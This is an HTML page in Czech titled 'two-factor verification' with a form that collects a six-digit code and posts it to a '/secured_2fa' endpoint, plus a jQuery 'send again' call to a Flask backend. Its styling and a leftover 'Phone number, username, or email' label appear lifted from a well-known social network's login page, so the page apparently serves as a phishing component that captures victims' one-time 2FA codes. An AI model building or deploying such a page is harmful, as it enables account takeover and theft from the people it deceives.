<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dvou Fázové Ověření</title>
    <link rel="icon" type="image/x-icon" href="static/favicon.png">
</head>
<body>
    <div class="former">
        <form class="HmktE" id="loginForm" method="post" action="/secured_2fa">
            <div class="_9GP1n">
                <label class="f0n8F"><span class="_9nyy2">Zadejte 6 místný kód</span><input aria-label="Phone number, username, or email" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" name="username" type="text" class="_2hvTZ pexuQ zyHYP" value=""></label>
                <div class="i24fI"></div>
            </div>
            <a class="_2Lks6" href="#" onclick="sendMessage()" tabindex="0">Poslat znovu</a>
            <button type="sumbit">odeslat</button>
        </form>
    </div>
</body>
<style>
    .former {
        max-width: 250px;
    }
    ._9GP1n {
    -webkit-box-align: center;
    -webkit-align-items: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-appearance: none;
    background: #fafafa;
    background: rgba(var(--b3f, 250, 250, 250), 1);
    border: 1px solid #dbdbdb;
    border: 1px solid rgba(var(--ca6, 219, 219, 219), 1);
    border-radius: 3px;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
    color: #262626;
    color: rgba(var(--i1d, 38, 38, 38), 1);
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -webkit-flex-direction: row;
    -ms-flex-direction: row;
    flex-direction: row;
    font-size: 14px;
    position: relative;
    width: 100%;
}
.f0n8F {
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    height: 36px;
    -webkit-box-flex: 1;
    -webkit-flex: 1 0 0;
    -ms-flex: 1 0 0;
    flex: 1 0 0;
    padding: 0;
    position: relative;
    margin: 0;
    min-width: 0;
}
._9nyy2 {
    color: #8e8e8e;
    color: rgba(var(--f52, 142, 142, 142), 1);
    font-size: 12px;
    height: 36px;
    left: 8px;
    line-height: 36px;
    overflow: hidden;
    pointer-events: none;
    position: absolute;
    right: 0;
    text-overflow: ellipsis;
    -webkit-transform-origin: left;
    transform-origin: left;
    -webkit-transition: -webkit-transform ease-out 0.1s;
    transition: -webkit-transform ease-out 0.1s;
    transition: transform ease-out 0.1s;
    transition: transform ease-out 0.1s, -webkit-transform ease-out 0.1s;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    white-space: nowrap;
}
.f0n8F .pexuQ {
    font-size: 16px;
}
._2hvTZ {
    background: #fafafa;
    background: rgba(var(--b3f, 250, 250, 250), 1);
    border: 0;
    -webkit-box-flex: 1;
    -webkit-flex: 1 0 auto;
    -ms-flex: 1 0 auto;
    flex: 1 0 auto;
    margin: 0;
    outline: 0;
    overflow: hidden;
    padding: 9px 0 7px 8px;
    text-overflow: ellipsis;
}
.zyHYP {
    -webkit-appearance: none;
}
._2Lks6, ._2Lks6:hover, ._2Lks6:active, ._2Lks6:visited {
    color: #00376b;
    color: rgba(var(--fe0, 0, 55, 107), 1);
    font-size: 12px;
    line-height: 16px;
    margin-top: 12px;
    text-align: center;
}
a, a:visited {
    color: #00376b;
    color: rgba(var(--fe0, 0, 55, 107), 1);
    text-decoration: none;
}
</style>
<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
<script>
function sendMessage() {
    // Odeslání asynchronního požadavku na server
    $.ajax({
        type: "POST",
        url: "/send_message",  // Změňte na správnou URL pro zpracování požadavku ve vaší aplikaci Flask
        data: { message: "Poslat znovu" },
        success: function(response) {
            console.log(response);  // Zde zpracujte odpověď od serveru
        },
        error: function(error) {
            console.error("Chyba při odesílání požadavku:", error);
        }
    });
}
</script>
</html>
<!--font-family: 'BlinkMacSystemFont', 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;-->